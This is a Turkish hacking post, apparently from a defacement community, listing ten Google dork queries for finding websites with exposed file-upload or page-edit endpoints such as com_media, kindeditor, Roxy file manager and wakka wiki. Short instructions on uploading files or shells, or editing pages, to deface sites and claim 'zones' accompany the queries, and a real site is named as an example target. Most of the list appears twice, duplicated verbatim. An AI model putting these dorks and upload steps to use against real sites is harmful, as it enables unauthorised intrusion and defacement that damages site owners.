-
Akifcan Hür
☾★ T'ÜRK ☾★
1 Google Dork : inurl:"/j.aspx?q="
Sitelerden Birine gir /j.aspx?q= buraya kadar sil
örneksite.com/j.aspx?q=HeçkıdBayYazYolla&id=MHPMrOpCyOCIoYlIjPfRtQ%3D%3D
2 inurl:com_media
Bu exploitte dosya upload ederek zone kasabilirsiniz dosyanızı resim olarak veya txt olarak atabilirsiniz...
shell atılıyor ama sitede çalışmıyor shelli gif olarak sokmaya çalıştım siz yinede farklı yöntemler denersiniz...
3 inurl:assetmanager/assetmanager.php
Bu exploitte de txt veya resim yükleyerek zone kasabilirsiniz...
4 inurl:/kindeditor/examples/uploadbutton.html
Bu exploitte de txt veya resim yükleyebilirsiniz...
5 inurl:wakka.php?wiki=
Bu exploitte url kısmına /edit ekleyerek sayfayı düzenleyebiliyorsunuz ve zonenizi alabiliyorsunuz...
örnek:http://tela-orthoptera.org/wakka.php?wiki=gsmsignalrepeater/edit
6 inurl:-/plugins/ImageManager/manager.php"
Bu exploitte resim yükleyerek deface edebilirsiniz...
7 inurl:”Sitefinity: Login”
Exploit:site.com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Bu exploittede kolaylıkla .jpg, .jpeg, .gif, .png. yükleyebilirsiniz...
8 inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
Bu dorku aratarak .txt .jpg ve daha fazlasını upload edebilirsiniz...
9 inurl:rte/my_documents/my_files
Exploit:site.com/rte/RTE_popup_file_atch.asp
COĞU KİŞİ BİLİR BUNU RTE AÇIĞIDIR YİNE Bİ UPLOAD AÇIĞIDIR .HTML ATABİLİRSİNİZ
10 intitle:"Roxy file manager"
Bu exploitte dosyamızı seçiyoruz yüklüyoruz sağ tık view diyoruz linki kopyalayıp zonemizi alıyoruz
Sitelerden Birine gir /j.aspx?q= buraya kadar sil
örneksite.com/j.aspx?q=HeçkıdBayYazYolla&id=MHPMrOpCyOCIoYlIjPfRtQ%3D%3D
2 inurl:com_media
Bu exploitte dosya upload ederek zone kasabilirsiniz dosyanızı resim olarak veya txt olarak atabilirsiniz...
shell atılıyor ama sitede çalışmıyor shelli gif olarak sokmaya çalıştım siz yinede farklı yöntemler denersiniz...
3 inurl:assetmanager/assetmanager.php
Bu exploitte de txt veya resim yükleyerek zone kasabilirsiniz...
4 inurl:/kindeditor/examples/uploadbutton.html
Bu exploitte de txt veya resim yükleyebilirsiniz...
5 inurl:wakka.php?wiki=
Bu exploitte url kısmına /edit ekleyerek sayfayı düzenleyebiliyorsunuz ve zonenizi alabiliyorsunuz...
örnek:http://tela-orthoptera.org/wakka.php?wiki=gsmsignalrepeater/edit
6 inurl:-/plugins/ImageManager/manager.php"
Bu exploitte resim yükleyerek deface edebilirsiniz...
7 inurl:”Sitefinity: Login”
Exploit:site.com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Bu exploittede kolaylıkla .jpg, .jpeg, .gif, .png. yükleyebilirsiniz...
8 inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
Bu dorku aratarak .txt .jpg ve daha fazlasını upload edebilirsiniz...
9 inurl:rte/my_documents/my_files
Exploit:site.com/rte/RTE_popup_file_atch.asp
COĞU KİŞİ BİLİR BUNU RTE AÇIĞIDIR YİNE Bİ UPLOAD AÇIĞIDIR .HTML ATABİLİRSİNİZ
10 intitle:"Roxy file manager"
Bu exploitte dosyamızı seçiyoruz yüklüyoruz sağ tık view diyoruz linki kopyalayıp zonemizi alıyoruz
